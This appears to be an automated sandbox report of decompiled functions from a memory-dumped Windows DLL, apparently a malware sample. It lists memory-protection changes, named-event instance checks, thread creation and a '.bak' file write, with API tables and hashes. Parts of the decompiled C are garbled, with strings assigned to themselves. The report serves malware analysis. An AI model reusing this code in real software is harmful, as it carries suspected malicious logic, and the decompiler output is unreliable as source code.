                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ExchangeInterlocked$CompareFreeHeap$DestroySleepVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 722554433-0
                                                                                                                        • Opcode ID: 4d03ccb2a8fceb300e0a492fa577b267cb3661af096589466fe62b4cd9b566db
                                                                                                                        • Instruction ID: 92e97a168a39c2040c4d3879760a03b435e06fcb1534dee1769a7c4c5f4515e4
                                                                                                                        • Opcode Fuzzy Hash: 4d03ccb2a8fceb300e0a492fa577b267cb3661af096589466fe62b4cd9b566db
                                                                                                                        • Instruction Fuzzy Hash: 81F062F3F01EA097DA50FB6A944046AB7ACEBE6635B01101EED45C6350CB3C98558751
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E6F33AD39(void* __eax, intOrPtr* __ebx, void* __ecx, intOrPtr* __edx, long _a4, long _a8, long _a12, long* _a16) {
                                                                                                                        				void* _v4;
                                                                                                                        				void* _t71;
                                                                                                                        				long _t97;
                                                                                                                        
                                                                                                                        				_t71 = __eax +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx;
                                                                                                                        				 *__ebx =  *__ebx + _t71;
                                                                                                                        				 *__ebx =  *__ebx + _t71 +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__edx;
                                                                                                                        				 *((intOrPtr*)(__ecx - 0x75)) =  *((intOrPtr*)(__ecx - 0x75)) + __edx;
                                                                                                                        				_push(__ecx);
                                                                                                                        				_v4 = _a4;
                                                                                                                        				_a4 = _a8;
                                                                                                                        				_t97 = NtProtectVirtualMemory(0xffffffff,  &_v4,  &_a4, _a12, _a16); // executed
                                                                                                                        				return 0 | _t97 > 0x00000000;
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                        • NtProtectVirtualMemory.NTDLL ref: 6F33AE07
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2706961497-0
                                                                                                                        • Opcode ID: 8ea0eaa53ac6174a8e4725aaae0ee8aa92fd42d3c44e1a6386682c972445f0d9
                                                                                                                        • Instruction ID: 6de7b3b9f436ebfc59c6c26f42391e41fc78e96b05a2420a815dc052ffe9dcf1
                                                                                                                        • Opcode Fuzzy Hash: 8ea0eaa53ac6174a8e4725aaae0ee8aa92fd42d3c44e1a6386682c972445f0d9
                                                                                                                        • Instruction Fuzzy Hash: 49F0FE761083519FC705CF58CC92A5A77E4AF9A710B148A5DE0A5C7684D730E414DB23
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33ADE0(long _a4, long _a8, long _a12, long* _a16) {
                                                                                                                        				void* _v4;
                                                                                                                        				long _t13;
                                                                                                                        
                                                                                                                        				_v4 = _a4;
                                                                                                                        				_a4 = _a8;
                                                                                                                        				_t13 = NtProtectVirtualMemory(0xffffffff,  &_v4,  &_a4, _a12, _a16); // executed
                                                                                                                        				return 0 | _t13 > 0x00000000;
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • NtProtectVirtualMemory.NTDLL ref: 6F33AE07
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2706961497-0
                                                                                                                        • Opcode ID: 679404aeb4e3949b46648c3ef56b2a84e3e871c2377f931929366847370fdef1
                                                                                                                        • Instruction ID: b78477e4b6319e3045174737d7de5677868566ed5ca31fd5eddb96b3805b58a4
                                                                                                                        • Opcode Fuzzy Hash: 679404aeb4e3949b46648c3ef56b2a84e3e871c2377f931929366847370fdef1
                                                                                                                        • Instruction Fuzzy Hash: B9E0BFB620C342AF8748CF58D951C5BB3E8ABC8720F10CA1DB1BAC3690D730D8088B22
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 80%
                                                                                                                        			E6F3378B0() {
                                                                                                                        				CHAR* _t23;
                                                                                                                        				char* _t24;
                                                                                                                        				CHAR* _t26;
                                                                                                                        				void* _t29;
                                                                                                                        				intOrPtr _t36;
                                                                                                                        				CHAR* _t40;
                                                                                                                        				char _t45;
                                                                                                                        				char _t51;
                                                                                                                        				void* _t52;
                                                                                                                        				void* _t55;
                                                                                                                        				int _t56;
                                                                                                                        				int _t57;
                                                                                                                        				CHAR* _t60;
                                                                                                                        				intOrPtr _t62;
                                                                                                                        				char* _t68;
                                                                                                                        				CHAR* _t71;
                                                                                                                        				intOrPtr _t76;
                                                                                                                        				intOrPtr _t81;
                                                                                                                        				CHAR* _t82;
                                                                                                                        				void* _t87;
                                                                                                                        				void* _t89;
                                                                                                                        				void* _t92;
                                                                                                                        				void* _t93;
                                                                                                                        				void* _t95;
                                                                                                                        				void* _t96;
                                                                                                                        				void* _t97;
                                                                                                                        				intOrPtr _t112;
                                                                                                                        
                                                                                                                        				_t60 =  *(_t93 + 0x320);
                                                                                                                        				if(_t60 == 0) {
                                                                                                                        					L20:
                                                                                                                        					_t23 =  *(_t93 + 0x320);
                                                                                                                        					_push(_t60);
                                                                                                                        					_push(_t23);
                                                                                                                        					_push( *((intOrPtr*)(_t93 + 0x31c)));
                                                                                                                        					M6F340594();
                                                                                                                        					return _t23;
                                                                                                                        				} else {
                                                                                                                        					_t24 = M6F340570; // 0x783f38
                                                                                                                        					if(StrCmpNIA(_t60, _t24, 0xa) == 0) {
                                                                                                                        						L4:
                                                                                                                        						_t26 = M6F34057C; // 0x784250
                                                                                                                        						if(lstrcmpiA(_t60, _t26) == 0) {
                                                                                                                        							if(M6F340514 > 0) {
                                                                                                                        								do {
                                                                                                                        									Sleep(0x3e8);
                                                                                                                        									_t56 = M6F340514; // 0x0
                                                                                                                        									_t57 = _t56 - 1;
                                                                                                                        									M6F340514 = _t57;
                                                                                                                        								} while (_t57 > 0);
                                                                                                                        							}
                                                                                                                        							if(M6F3404B8 != 0) {
                                                                                                                        								_t68 = M6F340530; // 0x997378
                                                                                                                        								wsprintfA(_t93 + 0x11c, "\"%s\"", _t68);
                                                                                                                        								_t51 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        								_push(_t51);
                                                                                                                        								_push(_t93 + 0x128);
                                                                                                                        								_t52 = E6F3329D0();
                                                                                                                        								_t93 = _t93 + 0x14;
                                                                                                                        								if(_t52 != 0) {
                                                                                                                        									_t89 = 0;
                                                                                                                        									while(1) {
                                                                                                                        										_t81 = M6F340544; // 0x1
                                                                                                                        										wsprintfA(_t93 + 0x1c, "%s%c%d", _t60, 0x45, _t81);
                                                                                                                        										_t93 = _t93 + 0x14;
                                                                                                                        										_t55 = OpenEventA(2, 0, _t93 + 0x10);
                                                                                                                        										if(_t55 != 0) {
                                                                                                                        											break;
                                                                                                                        										}
                                                                                                                        										Sleep(0x3e8); // executed
                                                                                                                        										_t89 = _t89 + 1;
                                                                                                                        										if(_t89 < 0xa) {
                                                                                                                        											continue;
                                                                                                                        										}
                                                                                                                        										goto L12;
                                                                                                                        									}
                                                                                                                        									_push(_t55); // executed
                                                                                                                        									L19:
                                                                                                                        									FindCloseChangeNotification(); // executed
                                                                                                                        									ExitProcess(0); // executed
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							L12:
                                                                                                                        							_t92 = 0;
                                                                                                                        							while(1) {
                                                                                                                        								_t112 = M6F340544; // 0x1
                                                                                                                        								wsprintfA(_t93 + 0x10, "%s%c%d", _t60, 0x45, 0 | _t112 == 0x00000000);
                                                                                                                        								_t93 = _t93 + 0x14;
                                                                                                                        								_t87 = OpenEventA(2, 0, _t93 + 0x10);
                                                                                                                        								if(_t87 == 0) {
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								_push(_t87);
                                                                                                                        								if(M6F340544 == 0) {
                                                                                                                        									goto L19;
                                                                                                                        								}
                                                                                                                        								SetEvent();
                                                                                                                        								CloseHandle(_t87);
                                                                                                                        								Sleep(0x3e8);
                                                                                                                        								_t92 = _t92 + 1;
                                                                                                                        								if(_t92 < 0x3c) {
                                                                                                                        									continue;
                                                                                                                        								}
                                                                                                                        								break;
                                                                                                                        							}
                                                                                                                        							_push(0xc);
                                                                                                                        							_push(0x6f34046c);
                                                                                                                        							L6F33C2EE();
                                                                                                                        							_t76 = M6F340544; // 0x1
                                                                                                                        							wsprintfA(_t93 + 0x1c, "%s%c%d", _t60, 0x45, _t76);
                                                                                                                        							_t95 = _t93 + 0x14;
                                                                                                                        							 *0x6f34046c = CreateEventA( *(_t93 + 0x338), 1, 0, _t95 + 0x10);
                                                                                                                        							_t36 = M6F34057C; // 0x784250
                                                                                                                        							wsprintfA(_t95 + 0x1c, "%s%s%c", "Global\\", _t36, 0x4b);
                                                                                                                        							_t96 = _t95 + 0x14;
                                                                                                                        							 *0x6f340470 = CreateEventA(0, 1, 0, _t96 + 0x10);
                                                                                                                        							E6F332170(_t38, 6);
                                                                                                                        							_t40 = M6F34057C; // 0x784250
                                                                                                                        							wsprintfA(_t96 + 0x24, "%s%s%c", "Global\\", _t40, 0x52);
                                                                                                                        							_t97 = _t96 + 0x1c;
                                                                                                                        							 *0x6f340474 = CreateEventA(0, 1, 0, _t97 + 0x10);
                                                                                                                        							E6F332170(_t42, 6);
                                                                                                                        							M6F340510 = CreateThread(0, 0, E6F335240, 0, 0, 0);
                                                                                                                        							_t45 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        							E6F332DF0(_t45, ".bak");
                                                                                                                        							_t93 = _t97 + 0x10;
                                                                                                                        						}
                                                                                                                        						_t62 = M6F340544; // 0x1
                                                                                                                        						wsprintfA(_t93 + 0x1c, "%s%c%d", _t60, 0x48, _t62);
                                                                                                                        						_t29 = _t93 + 0x24;
                                                                                                                        						_push(_t29);
                                                                                                                        						_push( *((intOrPtr*)(_t93 + 0x33c)));
                                                                                                                        						_push( *(_t93 + 0x338));
                                                                                                                        						M6F340594();
                                                                                                                        						return _t29;
                                                                                                                        					} else {
                                                                                                                        						_t71 = M6F340574; // 0x784294
                                                                                                                        						if(lstrcmpiA(_t60, _t71) == 0) {
                                                                                                                        							goto L4;
                                                                                                                        						} else {
                                                                                                                        							_t82 = M6F340578; // 0x798f80
                                                                                                                        							if(lstrcmpiA(_t60, _t82) != 0) {
                                                                                                                        								goto L20;
                                                                                                                        							} else {
                                                                                                                        								goto L4;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}































                                                                                                                        APIs
                                                                                                                        • StrCmpNIA.SHLWAPI(?,00783F38,0000000A), ref: 6F3378D0
                                                                                                                        • lstrcmpiA.KERNEL32(?,00784294), ref: 6F3378E8
                                                                                                                        • lstrcmpiA.KERNEL32(?,00798F80), ref: 6F3378F6
                                                                                                                        • lstrcmpiA.KERNEL32(?,00784250), ref: 6F337909
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F337927
                                                                                                                        • wsprintfA.USER32 ref: 6F337959
                                                                                                                        • wsprintfA.USER32 ref: 6F33798B
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F337999
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F3379AC
                                                                                                                        • wsprintfA.USER32 ref: 6F3379D9
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F3379E7
                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 6F337A01
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F337A08
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F337A13
                                                                                                                        • RtlZeroMemory.NTDLL(6F34046C,0000000C), ref: 6F337A26
                                                                                                                        • wsprintfA.USER32 ref: 6F337A3F
                                                                                                                        • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 6F337A5B
                                                                                                                        • wsprintfA.USER32 ref: 6F337A79
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6F337A89
                                                                                                                        • wsprintfA.USER32 ref: 6F337AAF
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6F337ABF
                                                                                                                        • CreateThread.KERNEL32 ref: 6F337AE0
                                                                                                                        • wsprintfA.USER32 ref: 6F337B12
                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 6F337B40
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F337B48
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$Event$Create$Sleeplstrcmpi$CloseOpen$ChangeExitFindHandleMemoryNotificationProcessThreadZero
                                                                                                                        • String ID: "%s"$%s%c%d$%s%s%c$.bak$8?x$Global\$PBx
                                                                                                                        • API String ID: 2835795260-1469005943
                                                                                                                        • Opcode ID: 6836e5531d8b0a8fe9399ffeacc6e3ed9f17350f47f84309346f365f210dd502
                                                                                                                        • Instruction ID: a6b6b7b4af4bb5f110e3aea0af5fc70feeb22d42f8c1c554d19a052ca8d20c7c
                                                                                                                        • Opcode Fuzzy Hash: 6836e5531d8b0a8fe9399ffeacc6e3ed9f17350f47f84309346f365f210dd502
                                                                                                                        • Instruction Fuzzy Hash: 0471F3B3E08B99AFE720EB64CC85FAB37ADEB99710F00050DF61596180DB71E5188B61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 56%
                                                                                                                        			E6F33BBBE(intOrPtr _a4, long _a8, intOrPtr _a12) {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* __ebp;
                                                                                                                        				void* _t12;
                                                                                                                        				void* _t13;
                                                                                                                        				void* _t14;
                                                                                                                        				void* _t16;
                                                                                                                        				long _t20;
                                                                                                                        				void* _t22;
                                                                                                                        				long _t24;
                                                                                                                        				void* _t26;
                                                                                                                        				long _t36;
                                                                                                                        				signed int _t38;
                                                                                                                        				void* _t39;
                                                                                                                        				char _t43;
                                                                                                                        
                                                                                                                        				if(_a8 != 0) {
                                                                                                                        					__eflags = _a8 - 1;
                                                                                                                        					if(_a8 != 1) {
                                                                                                                        						L33:
                                                                                                                        						return 1;
                                                                                                                        					}
                                                                                                                        					_t24 =  *( *[fs:0x18] + 4);
                                                                                                                        					_a8 = 0;
                                                                                                                        					_push(0);
                                                                                                                        					while(1) {
                                                                                                                        						_t12 = InterlockedCompareExchange(0x6f340964, _t24, ??);
                                                                                                                        						__eflags = _t12;
                                                                                                                        						if(_t12 == 0) {
                                                                                                                        							break;
                                                                                                                        						}
                                                                                                                        						__eflags = _t12 - _t24;
                                                                                                                        						if(_t12 == _t24) {
                                                                                                                        							_a8 = 1;
                                                                                                                        							L11:
                                                                                                                        							_t13 =  *0x6f340960; // 0x0
                                                                                                                        							_t36 = 2;
                                                                                                                        							__eflags = _t13;
                                                                                                                        							if(_t13 == 0) {
                                                                                                                        								 *0x6f340960 = 1; // executed
                                                                                                                        								_t14 = E6F33BB78(0x6f33d47c, 0x6f33d484); // executed
                                                                                                                        								__eflags = _t14;
                                                                                                                        								if(_t14 != 0) {
                                                                                                                        									L3:
                                                                                                                        									return 0;
                                                                                                                        								}
                                                                                                                        								_push(0x6f33d478);
                                                                                                                        								_push(0x6f33d474);
                                                                                                                        								L6F33C0B0();
                                                                                                                        								 *0x6f340960 = _t36;
                                                                                                                        								L15:
                                                                                                                        								__eflags = _a8;
                                                                                                                        								if(_a8 == 0) {
                                                                                                                        									InterlockedExchange(0x6f340964, 0);
                                                                                                                        								}
                                                                                                                        								__eflags =  *0x6f340974; // 0x0
                                                                                                                        								if(__eflags != 0) {
                                                                                                                        									_push(0x6f340974);
                                                                                                                        									_t16 = E6F33C044(0, _t36, 0x6f340964, __eflags);
                                                                                                                        									__eflags = _t16;
                                                                                                                        									if(_t16 != 0) {
                                                                                                                        										 *0x6f340974(_a4, _t36, _a12);
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								"mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" + 1;
                                                                                                                        								goto L33;
                                                                                                                        							}
                                                                                                                        							_push(0x1f);
                                                                                                                        							L6F33C0B6();
                                                                                                                        							goto L15;
                                                                                                                        						}
                                                                                                                        						Sleep(0x3e8);
                                                                                                                        						_push(0);
                                                                                                                        					}
                                                                                                                        					goto L11;
                                                                                                                        				}
                                                                                                                        				_t43 = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
                                                                                                                        				if(_t43 <= 0) {
                                                                                                                        					goto L3;
                                                                                                                        				}
                                                                                                                        				"mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" - 1;
                                                                                                                        				_push(0);
                                                                                                                        				while(InterlockedCompareExchange(0x6f340964, 1, ??) != 0) {
                                                                                                                        					Sleep(0x3e8);
                                                                                                                        					_push(0);
                                                                                                                        				}
                                                                                                                        				_t20 =  *0x6f340960; // 0x0
                                                                                                                        				if(_t20 == 2) {
                                                                                                                        					_t26 =  *0x6f34096c; // 0x0
                                                                                                                        					__eflags = _t26;
                                                                                                                        					if(_t26 == 0) {
                                                                                                                        						L32:
                                                                                                                        						 *0x6f340960 = 0;
                                                                                                                        						InterlockedExchange(0x6f340964, 0);
                                                                                                                        						goto L33;
                                                                                                                        					}
                                                                                                                        					_t38 =  *0x6f340968; // 0x0
                                                                                                                        					_t39 = _t38 + 0xfffffffc;
                                                                                                                        					while(1) {
                                                                                                                        						__eflags = _t39 - _t26;
                                                                                                                        						if(_t39 < _t26) {
                                                                                                                        							break;
                                                                                                                        						}
                                                                                                                        						_t22 =  *_t39;
                                                                                                                        						__eflags = _t22;
                                                                                                                        						if(_t22 != 0) {
                                                                                                                        							 *_t22();
                                                                                                                        						}
                                                                                                                        						_t39 = _t39 - 4;
                                                                                                                        						__eflags = _t39;
                                                                                                                        					}
                                                                                                                        					free(_t26);
                                                                                                                        					 *0x6f340968 =  *0x6f340968 & 0x00000000;
                                                                                                                        					 *0x6f34096c =  *0x6f34096c & 0x00000000;
                                                                                                                        					__eflags =  *0x6f34096c;
                                                                                                                        					goto L32;
                                                                                                                        				}
                                                                                                                        				_push(0x1f);
                                                                                                                        				L6F33C0B6();
                                                                                                                        				goto L33;
                                                                                                                        			}



















                                                                                                                        0x6f33bc21
                                                                                                                        0x6f33bc27
                                                                                                                        0x6f33bc27
                                                                                                                        0x00000000
                                                                                                                        0x6f33bc31
                                                                                                                        0x6f33bbcd
                                                                                                                        0x6f33bbd3
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33bbd5
                                                                                                                        0x6f33bbe1
                                                                                                                        0x6f33bcd1
                                                                                                                        0x6f33bcc9
                                                                                                                        0x6f33bccf
                                                                                                                        0x6f33bccf
                                                                                                                        0x6f33bcda
                                                                                                                        0x6f33bce2
                                                                                                                        0x6f33bcee
                                                                                                                        0x6f33bcf4
                                                                                                                        0x6f33bcf6
                                                                                                                        0x6f33bd28
                                                                                                                        0x6f33bd2b
                                                                                                                        0x6f33bd35
                                                                                                                        0x00000000
                                                                                                                        0x6f33bd35
                                                                                                                        0x6f33bcf8
                                                                                                                        0x6f33bcfe
                                                                                                                        0x6f33bd0e
                                                                                                                        0x6f33bd0e
                                                                                                                        0x6f33bd10
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33bd03
                                                                                                                        0x6f33bd05
                                                                                                                        0x6f33bd07
                                                                                                                        0x6f33bd09
                                                                                                                        0x6f33bd09
                                                                                                                        0x6f33bd0b
                                                                                                                        0x6f33bd0b
                                                                                                                        0x6f33bd0b
                                                                                                                        0x6f33bd13
                                                                                                                        0x6f33bd19
                                                                                                                        0x6f33bd20
                                                                                                                        0x6f33bd20
                                                                                                                        0x00000000
                                                                                                                        0x6f33bd27
                                                                                                                        0x6f33bce4
                                                                                                                        0x6f33bce6
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • InterlockedCompareExchange.KERNEL32(6F340964,?,00000000), ref: 6F33BC2B
                                                                                                                        • _amsg_exit.MSVCRT ref: 6F33BC48
                                                                                                                        • InterlockedExchange.KERNEL32(6F340964,00000000), ref: 6F33BC92
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F33BCC9
                                                                                                                        • InterlockedCompareExchange.KERNEL32(6F340964,00000001,00000000), ref: 6F33BCD4
                                                                                                                        • _amsg_exit.MSVCRT ref: 6F33BCE6
                                                                                                                        • free.MSVCRT(00000000), ref: 6F33BD13
                                                                                                                        • InterlockedExchange.KERNEL32(6F340964,00000000), ref: 6F33BD35
                                                                                                                        Strings
